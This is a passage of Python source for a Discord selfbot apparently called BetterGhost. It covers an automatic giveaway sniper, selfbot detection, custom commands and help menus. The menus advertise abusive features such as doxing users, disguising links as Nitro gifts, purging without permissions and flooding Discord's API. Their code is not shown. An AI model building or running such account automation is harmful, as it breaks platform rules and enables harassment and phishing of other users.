if "giveaway" in message.content.lower() or "giveaway" in json.dumps(messageEmbed).lower():
isGiveaway = True
if isGiveaway:
if message.guild.id not in __ignoredservers__["giveaways"]:
embed = message.embeds[0].to_dict()
prize = embed["author"]["name"]
if "ban" in prize.lower() or "kick" in prize.lower() or "mute" in prize.lower() or "punish" in prize.lower():
print_sniper("Giveaway")
print_sniper_info("Prize", prize)
print_sniper_info("Skipped", "Sus prize.")
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Giveaway Sniper", f"Giveaway skipped because of sus prize.", 10)
else:
print_sniper("Giveaway")
print_sniper_info("Prize", prize)
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
if __giveawaywebhook__ != "":
webhook = DiscordWebhook(url=__giveawaywebhook__)
embed = DiscordEmbed(title='Giveaway Sniper', description=f"Sniped a giveaway for `{prize}` in `{message.guild.name}`.", color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
webhook.add_embed(embed)
response = webhook.execute()
# if __giveawaysniperui__ == True:
# def giveawayGUI():
# giveawayUi = tkinter.Tk()
# giveawayUi.attributes('-topmost', True)
# def addReactionForGiveaway():
# requests.put(f"https://discord.com/api/channels/{message.channel.id}/messages/{message.id}/reactions/%F0%9F%8E%89/@me", headers={"Authorization": __token__, "User-Agent": get_random_user_agent()})
# def closeGui():
# giveawayUi.destroy()
# def joinGiveaway():
# print(f"{printSpaces} {fg.cYellow}Joined giveaway!")
# addReactionForGiveaway()
# closeGui()
# giveawayUi.wm_title("Giveaway UI")
# windowWidth = giveawayUi.winfo_reqwidth()
# windowHeight = giveawayUi.winfo_reqheight()
# positionRight = int(giveawayUi.winfo_screenwidth()/2 - windowWidth/2)
# positionDown = int(giveawayUi.winfo_screenheight()/2 - windowHeight/2)
# giveawayUi.geometry("+{}+{}".format(positionRight, positionDown))
# tkinter.Label(giveawayUi, text=" ").pack()
# mainLabel = tkinter.Label(giveawayUi, text="Would you like to join a giveaway for").pack()
# prizeLabel = tkinter.Label(giveawayUi, text=prize).pack()
# tkinter.Label(giveawayUi, text=" ").pack()
# joinBtn = tkinter.Button(giveawayUi, text="Join", command=joinGiveaway, width=15, height=2, bg="green", fg="white").pack(side=tkinter.constants.LEFT)
# cancelBtn = tkinter.Button(giveawayUi, text="Cancel", command=closeGui, width=15, height=2, bg="red", fg="white").pack(side=tkinter.constants.LEFT)
# giveawayUi.mainloop()
# giveawayGUI()
# if Config.getConfig()["sounds"]:
# if str(sounddevice.query_devices()) != "":
# pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
# pygame.mixer.music.play(1)
# send_notification("Giveaway Sniper", f"Sniped a giveaway for {prize}.", 10)
# if __giveawaywebhook__ != "":
# webhook = DiscordWebhook(url=__giveawaywebhook__)
# embed = DiscordEmbed(title='Giveaway Sniper', description=f"Joined a giveaway for `{prize}` after pressing join in Giveaway UI.", color=__embedcolourraw__[1:])
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.set_timestamp()
# embed.add_embed_field(name='Prize', value=prize, inline=False)
# embed.add_embed_field(name='Joined After', value=f"Pressing join in Giveaway UI.", inline=False)
# embed.add_embed_field(name='Jump to message', value=f"[Click Here!]({message.jump_url})", inline=False)
# webhook.add_embed(embed)
# response = webhook.execute()
# else:
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Giveaway Sniper", f"Sniped a giveaway for {prize}.", 10)
await asyncio.sleep(__giveawayjoindelay__)
emoji = GIVEAWAYBOTS[str(message.author.id)]
await message.add_reaction(emoji)
if __giveawaywebhook__ != "":
webhook = DiscordWebhook(url=__giveawaywebhook__)
embed = DiscordEmbed(title='Giveaway Sniper', description=f"Joined a giveaway for `{prize}` after `{__giveawayjoindelay__}` seconds.", color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
webhook.add_embed(embed)
response = webhook.execute()
print_sniper("Giveaway")
print_sniper_info("Prize", prize)
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
print_sniper_info("Joined after", f"{__giveawayjoindelay__} seconds.")
send_notification("Giveaway Sniper", f"Joined a giveaway for {prize}.", 10)
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
# if "congratulations" in message.content.lower():
# if f"<@{BetterGhost.user.id}>" in message.content.lower():
# prize = message.content.split("!")[1].split("**")[1]
# print_sniper("Giveaway")
# print(f" {fg.cYellow}You won!!!")
# print_sniper_info("Prize", prize)
# try:
# print_sniper_info("Server", message.guild.name)
# except:
# pass
# try:
# print_sniper_info("Channel", message.channel.name)
# except:
# pass
# if __giveawaywebhook__ != "":
# webhook = DiscordWebhook(url=__giveawaywebhook__)
# embed = DiscordEmbed(title='Giveaway Sniper', description=f"You won a giveaway for `{prize}`!", color=__embedcolourraw__[1:])
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.set_timestamp()
# webhook.add_embed(embed)
# response = webhook.execute()
# send_notification("Giveaway Sniper", f"You won a giveaway for {prize} 🎉!", 10)
# if Config.getConfig()["sounds"]:
# if str(sounddevice.query_devices()) != "":
# pygame.mixer.music.load(resource_path("sounds/giveaway-win.mp3"))
# pygame.mixer.music.play(1)
if Config.getConfig()["detections"]["selfbot"]:
if not message.author.bot:
if message.embeds:
if "http" not in message.content:
if message.guild.id not in __ignoredservers__["selfbots"]:
print_detect("Selfbot")
print_sniper_info("Author", message.author)
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
print_sniper_info("Reason", "Sent an embedded message.")
if __selfbotwebhook__ != "":
webhook = DiscordWebhook(url=__selfbotwebhook__)
embed = DiscordEmbed(title='Selfbot', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='Author', value=str(message.author), inline=False)
try:
embed.add_embed_field(name='Server', value=str(message.guild.name), inline=False)
except:
pass
try:
embed.add_embed_field(name='Channel', value=str(message.channel.name), inline=False)
except:
pass
embed.add_embed_field(name='Reason', value="Sent an embedded message.", inline=False)
webhook.add_embed(embed)
response = webhook.execute()
if message.author.id == BetterGhost.user.id:
ccmd = json.load(open("customcommands.json"))
for key in ccmd:
cmd = key
response = ccmd[key]
if message.content == f"{__prefix__}{cmd}":
print_cmd(f"{cmd}")
try:
await message.delete()
except:
pass
response = response.replace("{currenttime}", str(datetime.now().strftime("%H:%M:%S")))
response = response.replace("{currentdate}", str(datetime.now().strftime("%d/%m/%Y")))
response = response.replace("{version}", str(version))
response = response.replace("{prefix}", str(__prefix__))
response = response.replace("{theme}", str(__theme__))
response = response.replace("{randomint}", str(random.randint(1000, 9999)))
response = response.replace("{randomstring}", str(''.join(random.choice(string.ascii_letters) for i in range(8))))
await message.channel.send(response)
if (uwuifyEnabled):
if (not message.content.startswith(__prefix__) or message.content == "" or message.content == None):
uwuedMessage = uwuify.uwu(message.content)
await message.edit(content=uwuedMessage)
#print(str(message.author) + " : " + str(message.content))
await BetterGhost.process_commands(message)
for filename in os.listdir('scripts/'):
if filename.endswith('.py'):
include(f'scripts/{filename}')
@BetterGhost.command(name="scripts", description="Display all custom scripts.", usage="scripts", aliases=["customscripts"])
async def scripts(ctx):
totalscripts = len(os.listdir('scripts/'))
text = ""
for script in os.listdir('scripts/'):
if script.endswith('.py'):
script = script.replace(".py", "")
text += f"{script}\n"
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", description=f"Found {totalscripts} custom scripts", color=__embedcolour__)
embed.add_field(name="Scripts", value=text)
embed.set_author(name="Custom Scripts")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Custom Scripts ]
Found {totalscripts} custom scripts
{text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="customcommands", description="Display all custom commands.", usage="customcommands", aliases=["ccmds"])
async def customcommands(ctx):
totalcmds = len(ccmd)
ccmd2 = ""
for key in ccmd:
cmd = key
ccmd2 = ccmd2 + f"{__prefix__}{cmd}\n"
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"Found {totalcmds} custom commands.")
embed.add_field(name="Commands", value=ccmd2)
embed.set_author(name="Custom Commands")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Custom Commands ]
Found {totalcmds} custom commands.
{ccmd2}
{__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="allcmds", description="Print a list of all the commands.", usage="allcmds", aliases=["features"])
async def allcmds(ctx):
await ctx.message.delete()
content = ""
totalCommands = len(BetterGhost.commands)
for command in BetterGhost.commands:
content += f"{command.usage} : {command.description}\n"
file = open("data/features.txt", "w")
file.write(f"[All Commands]\nTotal Commands: {totalCommands}\n \n" + content)
file.close()
os.system("notepad data/features.txt")
@BetterGhost.command(name="search", description="Search for commands.", usage="search [term]")
async def search(ctx, *, command = None):
if command is None:
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description="Please enter a command to search for.")
embed.set_author(name="Search")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_image(url=__embedlargeimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Search ]
Please enter a command to search for.
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
else:
text = ""
text2 = ""
searchedItems = 0
for cmd in BetterGhost.commands:
if command in cmd.name or command in cmd.description or command in cmd.aliases:
searchedItems += 1
text += f"`{BetterGhost.command_prefix}`**{cmd.usage}** » {cmd.description}\n"
text2 += f"{BetterGhost.command_prefix}{cmd.usage} » {cmd.description}\n"
try:
if __embedmode__:
embed = discord.Embed(title=f"Search results...", description=f"Found `{searchedItems}` items for `{command}`.\n\n{text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_image(url=__embedlargeimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Searched for {command} ]
{text2}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
except:
if __embedmode__:
embed = discord.Embed(title=f"Check console for search results", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_image(url=__embedlargeimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Check console for search results ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
print(f"[ Search results for {command} ]\n{text2}")
@BetterGhost.command(name="help", description="The help command.", usage="help (command)", aliases=["cmds", "commands"])
async def help(ctx, *, command = None):
totalcmds = len(BetterGhost.commands)-len(scriptsList)
if command is None:
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
Arguments in `[]` are required, arguments in `()` are optional.
`{BetterGhost.command_prefix}`**text (page 1/2)** » Text commands.
`{BetterGhost.command_prefix}`**fun (page 1)** » Fun commands.
`{BetterGhost.command_prefix}`**image (page 1)** » Image commands.
`{BetterGhost.command_prefix}`**moderation (page 1)** » Moderation commands.
`{BetterGhost.command_prefix}`**info (page 1)** » Info commands.
`{BetterGhost.command_prefix}`**user (page 1)** » User commands.
`{BetterGhost.command_prefix}`**selfbot (page 1)** » Selfbot commands.
`{BetterGhost.command_prefix}`**webhook (page 1)** » Webhook commands.
`{BetterGhost.command_prefix}`**abuse (page 1)** » Abuse commands.
`{BetterGhost.command_prefix}`**themes (page 1)** » Theme commands.
`{BetterGhost.command_prefix}`**giveaway (page 1)** » Giveaway commands.
`{BetterGhost.command_prefix}`**nsfw (page 1)** » NSFW commands.
`{BetterGhost.command_prefix}`**proxy (page 1)** » Proxy commands.
`{BetterGhost.command_prefix}`**tools (page 1)** » Discord and other tools.
`{BetterGhost.command_prefix}`**customcommands** » Your custom commands.
`{BetterGhost.command_prefix}`**customscripts** » Your scripts.
`{BetterGhost.command_prefix}`**search [term]** » Search for a command.
`{BetterGhost.command_prefix}`**help (command)** » Help for a specific command.
There is a total of `{totalcmds}` commands.
""")
embed.set_author(name="All Commands")
embed.set_image(url=__embedlargeimage__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ {__embedtitle__} ]
Arguments in [] are required, arguments in () are optional.
{BetterGhost.command_prefix}text (page 1/2) » Text commands.
{BetterGhost.command_prefix}fun (page 1) » Fun commands.
{BetterGhost.command_prefix}image (page 1) » Image commands.
{BetterGhost.command_prefix}moderation (page 1) » Moderation commands.
{BetterGhost.command_prefix}info (page 1) » Info commands.
{BetterGhost.command_prefix}user (page 1) » User commands.
{BetterGhost.command_prefix}selfbot (page 1) » Selfbot commands.
{BetterGhost.command_prefix}webhook (page 1) » Webhook commands.
{BetterGhost.command_prefix}abuse (page 1) » Abuse commands.
{BetterGhost.command_prefix}themes (page 1) » Theme commands.
{BetterGhost.command_prefix}giveaway (page 1) » Giveaway commands.
{BetterGhost.command_prefix}nsfw (page 1) » NSFW commands.
{BetterGhost.command_prefix}proxy (page 1) » Proxy commands.
{BetterGhost.command_prefix}tools (page 1) » Discord and other tools.
{BetterGhost.command_prefix}customcommands » Your custom commands.
{BetterGhost.command_prefix}customscripts » Your scripts.
{BetterGhost.command_prefix}search [term] » Search for a command.
{BetterGhost.command_prefix}help (command) » Help for a specific command.
There is a total of {totalcmds} commands.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
for cmd in BetterGhost.commands:
if command == cmd.name or command in cmd.aliases:
if not cmd.aliases:
cmd.aliases.append("No aliases")
if __embedmode__:
embed = discord.Embed(title=f"{cmd.name}", color=__embedcolour__)
embed.add_field(name="Usage", value=f"{cmd.usage}", inline=False)
embed.add_field(name="Description", value=f"{cmd.description}", inline=False)
embed.add_field(name="Aliases", value=', '.join(cmd.aliases))
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ {cmd.name} ]
Usage: {cmd.usage}
Description: {cmd.description}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="themes", description="Theme related commands.", usage="themes")
async def themes(ctx):
themes = ""
for theme in os.listdir("themes"):
if theme.endswith(".json"):
theme = theme.replace(".json", "")
themes += f"{theme}\n"
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__)
embed.add_field(name="Current Theme", value=f"{__theme__}", inline=False)
embed.add_field(name="Other Themes", value=f"{themes}", inline=False)
embed.add_field(name="Commands", value=f"`{BetterGhost.command_prefix}`**newtheme [name]** » Create a new theme with the given name.\n`{BetterGhost.command_prefix}`**deltheme [name]** » Delete the named theme.\n`{BetterGhost.command_prefix}`**theme [theme]** » Change your current theme.\n`{BetterGhost.command_prefix}`**ctheme** » Community themes.", inline=False)
embed.set_author(name="Theme Commands")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Theme Commands ]
Current Theme: {__theme__}
[ Other Themes ]
{themes}
[ Commands ]
{BetterGhost.command_prefix}newtheme [name] » Create a new theme with the given name.
{BetterGhost.command_prefix}deltheme [name] » Delete the named theme.
{BetterGhost.command_prefix}theme [theme] » Change your current theme.
{BetterGhost.command_prefix}cthemes » Community themes.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="ctheme", description="Community themes.", usage="ctheme", aliases=["communitythemes", "cloudthemes", "cthemes"])
async def ctheme(ctx, *, dl = None):
if dl is None:
url = "https://raw.githubusercontent.com/BetterGhostSelfbot/Community-Themes/main/themes.txt"
themes = requests.get(url).text.split("\n")
if __embedmode__:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", description=f"Community Themes, run `{BetterGhost.command_prefix}ctheme (theme name)` to download the theme.\n ", color=__embedcolour__)
embed.add_field(name="Theme List", value='\n'.join(themes))
embed.set_author(name="Community Themes")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Community Themes ]
Community Themes, run {BetterGhost.command_prefix}ctheme (theme name) to download the theme.
[ Theme List ]
{themes}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
request = requests.get("https://raw.githubusercontent.com/BetterGhostSelfbot/Community-Themes/main/themes.txt")
themes = []
for line in request.text.split("\n"):
themes.append(line.replace("\r", ""))
if dl in themes:
url = f'https://raw.githubusercontent.com/BetterGhostSelfbot/Community-Themes/main/{dl}.json'
data = requests.get(url, allow_redirects=True)
open(f'themes/{dl}.json', 'wb').write(data.content)
if __embedmode__:
embed = discord.Embed(title="Theme downloaded successfully", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Theme downloaded successfully ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="text", description="Text related commands.", usage="text (page)")
async def text(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**js [message]** » Send all your messages in a JavaScript code block.
`{BetterGhost.command_prefix}`**lua [message]** » Send all your messages in a Lua code block.
`{BetterGhost.command_prefix}`**php [message]** » Send all your messages in a PHP code block.
`{BetterGhost.command_prefix}`**html [message]** » Send all your messages in a HTML code block.
`{BetterGhost.command_prefix}`**css [message]** » Send all your messages in a CSS code block.
`{BetterGhost.command_prefix}`**yaml [message]** » Send all your messages in a YAML code block.
`{BetterGhost.command_prefix}`**json [message]** » Send all your messages in a JSON code block.
`{BetterGhost.command_prefix}`**cpp [message]** » Send all your messages in a C++ code block.
`{BetterGhost.command_prefix}`**cs [message]** » Send all your messages in a C# code block.
`{BetterGhost.command_prefix}`**java [message]** » Send all your messages in a Java code block.
`{BetterGhost.command_prefix}`**python [message]** » Send all your messages in a Python code block.
`{BetterGhost.command_prefix}`**secret [message]** » Send all your messages in a secret block.
`{BetterGhost.command_prefix}`**secretletters [message]** » Put all lettes from your message into separate secret blocks
`{BetterGhost.command_prefix}`**regional [message]** » Replace all letters with emoji.
`{BetterGhost.command_prefix}`**bold [message]** » Send all your messages in bold.
`{BetterGhost.command_prefix}`**italic [message]** » Send all your messages in italics.
""")
embed.set_author(name="Text Commands (1/2)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
elif page == 2:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**rembed (delay) [title]** » Kill Discord's API with a sexy rainbow embedded message.
`{BetterGhost.command_prefix}`**cembed [title] [description] [colour]** » Create a custom embedded message.
`{BetterGhost.command_prefix}`**embed [title]** » Create an embedded message.
`{BetterGhost.command_prefix}`**suggest [suggestion]** » Suggest something.
`{BetterGhost.command_prefix}`**privatemsg [message]** » Send an encrypted message.
`{BetterGhost.command_prefix}`**privatemsgdecode [message]** » Decode an encrypted message.
`{BetterGhost.command_prefix}`**blank** » Send a blank message
`{BetterGhost.command_prefix}`**length [string]** » Get the length of a string.
`{BetterGhost.command_prefix}`**chatbypass [text]** » Bypass chat language restrictions.
`{BetterGhost.command_prefix}`**shrug** » Shrug your arms.
`{BetterGhost.command_prefix}`**tableflip** » Flip the table.
`{BetterGhost.command_prefix}`**unflip** » Put the table back.
`{BetterGhost.command_prefix}`**lmgtfy [search]** » Let me Google that for you.
`{BetterGhost.command_prefix}`**typing [start/stop]** » Start or stop typing.
`{BetterGhost.command_prefix}`**aesthetic [text]** » Send your text s p a c e d out.
`{BetterGhost.command_prefix}`**lowercase [msg]** » Send your message in lowercase.
`{BetterGhost.command_prefix}`**uppercase [msg]** » Send your message in uppercase.
`{BetterGhost.command_prefix}`**sentencecase [msg]** » Send your messages in sentence case.
`{BetterGhost.command_prefix}`**ascii [text]** » Send your message in ascii.
`{BetterGhost.command_prefix}`**zalgo [text]** » Unleash the zalgo into your message.
`{BetterGhost.command_prefix}`**leet [text]** » Turn your text into 1337 text.
`{BetterGhost.command_prefix}`**fakeedited [message]** » "Edit" a message.
""")
embed.set_author(name="Text Commands (2/2)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
if page == 1:
await ctx.send(f"""```ini
[ Text Commands (1/2) ]
{BetterGhost.command_prefix}js [message] » Send all your messages in a JavaScript code block.
{BetterGhost.command_prefix}lua [message] » Send all your messages in a Lua code block.
{BetterGhost.command_prefix}php [message] » Send all your messages in a PHP code block.
{BetterGhost.command_prefix}html [message] » Send all your messages in a HTML code block.
{BetterGhost.command_prefix}css [message] » Send all your messages in a CSS code block.
{BetterGhost.command_prefix}yaml [message] » Send all your messages in a YAML code block.
{BetterGhost.command_prefix}json [message] » Send all your messages in a JSON code block.
{BetterGhost.command_prefix}cpp [message] » Send all your messages in a C++ code block.
{BetterGhost.command_prefix}cs [message] » Send all your messages in a C# code block.
{BetterGhost.command_prefix}java [message] » Send all your messages in a Java code block.
{BetterGhost.command_prefix}python [message] » Send all your messages in a Python code block.
{BetterGhost.command_prefix}secret [message] » Send all your messages in a secret block.
{BetterGhost.command_prefix}secretletters [message] » Put all lettes from your message into separate secret blocks
{BetterGhost.command_prefix}regional [message] » Replace all letters with emoji.
{BetterGhost.command_prefix}bold [message] » Send all your messages in bold.
{BetterGhost.command_prefix}italic [message] » Send all your messages in italics.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
elif page == 2:
await ctx.send(f"""```ini
[ Text Commands (2/2) ]
{BetterGhost.command_prefix}rembed (delay) [title] » Kill Discord's API with a sexy rainbow embedded message.
{BetterGhost.command_prefix}cembed [title] [description] [colour] » Create a custom embedded message.
{BetterGhost.command_prefix}embed [title] » Create an embedded message.
{BetterGhost.command_prefix}suggest [suggestion] » Suggest something.
{BetterGhost.command_prefix}privatemsg [message] » Send an encrypted message.
{BetterGhost.command_prefix}privatemsgdecode [message] » Decode an encrypted message.
{BetterGhost.command_prefix}blank » Send a blank message
{BetterGhost.command_prefix}length [string] » Get the length of a string.
{BetterGhost.command_prefix}chatbypass [text] » Bypass chat language restrictions.
{BetterGhost.command_prefix}shrug » Shrug your arms.
{BetterGhost.command_prefix}tableflip » Flip the table.
{BetterGhost.command_prefix}unflip » Put the table back.
{BetterGhost.command_prefix}lmgtfy [search] » Let me Google that for you.
{BetterGhost.command_prefix}typing [start/stop] » Start or stop typing.
{BetterGhost.command_prefix}aesthetic [text] » Send your text s p a c e d out.
{BetterGhost.command_prefix}lowercase [msg] » Send your message in lowercase.
{BetterGhost.command_prefix}uppercase [msg] » Send your message in uppercase.
{BetterGhost.command_prefix}sentencecase [msg] » Send your messages in sentence case.
{BetterGhost.command_prefix}ascii [text] » Send your message in ascii.
{BetterGhost.command_prefix}zalgo [text] » Unleash the zalgo into your message.
{BetterGhost.command_prefix}leet [text] » Turn your text into 1337 text.
{BetterGhost.command_prefix}fakeedited [message] » "Edit" a message.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="fun", description="Fun related commands.", usage="fun")
async def fun(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**slots** » Play the slot machine.
`{BetterGhost.command_prefix}`**yomomma** » Random yo momma joke.
`{BetterGhost.command_prefix}`**socialcredit [@user]** » A users social credit score.
`{BetterGhost.command_prefix}`**roast [@user]** » Roast a user.
`{BetterGhost.command_prefix}`**howgay [@user]** » How gay a user is.
`{BetterGhost.command_prefix}`**howskid [@user]** » Check the percentage of a skid.
`{BetterGhost.command_prefix}`**iq [@user]** » Check how smart a user is.
`{BetterGhost.command_prefix}`**pp [@user]** » The length of a user's penis.
`{BetterGhost.command_prefix}`**rainbowrole [@role]** » Kill Discord's API with a sexy rainbow role.
`{BetterGhost.command_prefix}`**coinflip** » Flip a coin.
`{BetterGhost.command_prefix}`**dice** » Roll a dice.
`{BetterGhost.command_prefix}`**8ball [question]** » Ask the magic eight ball a question.
`{BetterGhost.command_prefix}`**choice [choice1] [choice2]** » Pick a random choice.
`{BetterGhost.command_prefix}`**dox [@user]** » Dox the mentioned user.
`{BetterGhost.command_prefix}`**fakenitro [url]** » Hide a link in a nitro URL.
`{BetterGhost.command_prefix}`**purgehack** » Purge without permissions.
`{BetterGhost.command_prefix}`**dadjoke** » A random dad joke.
`{BetterGhost.command_prefix}`**randommessage** » A random message.
`{BetterGhost.command_prefix}`**randomquestion** » A random question.
`{BetterGhost.command_prefix}`**rickroll** » Send never gonna give you up lyrics one by one.
`{BetterGhost.command_prefix}`**stoprickroll** » Stop sending rick astley lyrics.
`{BetterGhost.command_prefix}`**countdown [number]** » Count down from a number.
`{BetterGhost.command_prefix}`**countup [number]** » Count up from a number.
`{BetterGhost.command_prefix}`**pytoexe [path]** » Convert a PY file to an executable.
""")
embed.set_author(name="Fun Commands (1/1)")
embed.set_thumbnail(url=__embedimage__)
embed.set_image(url=__embedlargeimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
pass
else:
await ctx.send(f"""```ini
[ Fun Commands ]
{BetterGhost.command_prefix}slots » Play the slot machine.
{BetterGhost.command_prefix}yomomma » Random yo momma joke.
{BetterGhost.command_prefix}socialcredit [@user] » A users social credit score.
{BetterGhost.command_prefix}roast [@user] » Roast a user.
{BetterGhost.command_prefix}howgay [@user] » How gay a user is.
{BetterGhost.command_prefix}howskid [@user] » Check the percentage of a skid.
{BetterGhost.command_prefix}iq [@user] » Check how smart a user is.
{BetterGhost.command_prefix}pp [@user] » The length of a user's penis.
{BetterGhost.command_prefix}rainbowrole [@role] » Kill Discord's API with a sexy rainbow role.
{BetterGhost.command_prefix}coinflip » Flip a coin.
{BetterGhost.command_prefix}dice » Roll a dice.
{BetterGhost.command_prefix}8ball [question] » Ask the magic eight ball a question.
{BetterGhost.command_prefix}choice [choice1] [choice2] » Pick a random choice.
{BetterGhost.command_prefix}dox [@user] » Dox the mentioned user.
{BetterGhost.command_prefix}fakenitro [url] » Hide a link in a nitro URL.
{BetterGhost.command_prefix}purgehack » Purge without permissions.
{BetterGhost.command_prefix}dadjoke » A random dad joke.
{BetterGhost.command_prefix}randommessage » A random message.
{BetterGhost.command_prefix}randomquestion » A random question.
{BetterGhost.command_prefix}rickroll » Send never gonna give you up lyrics one by one.
{BetterGhost.command_prefix}stoprickroll » Stop sending rick astley lyrics.
{BetterGhost.command_prefix}countdown [number] » Count down from a number.
{BetterGhost.command_prefix}countup [number] » Count up from a number.
{BetterGhost.command_prefix}pytoexe [path] » Convert a PY file to an executable.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="image", description="Image related commands.", usage="image")
async def image(ctx, page:int = 1):
if __embedmode__:
if page == 1:
embed = discord.Embed(title=f"{__embedemoji__} **{__embedtitle__}** {__embedemoji__}", color=__embedcolour__, description=f"""
`{BetterGhost.command_prefix}`**meme** » A random meme.
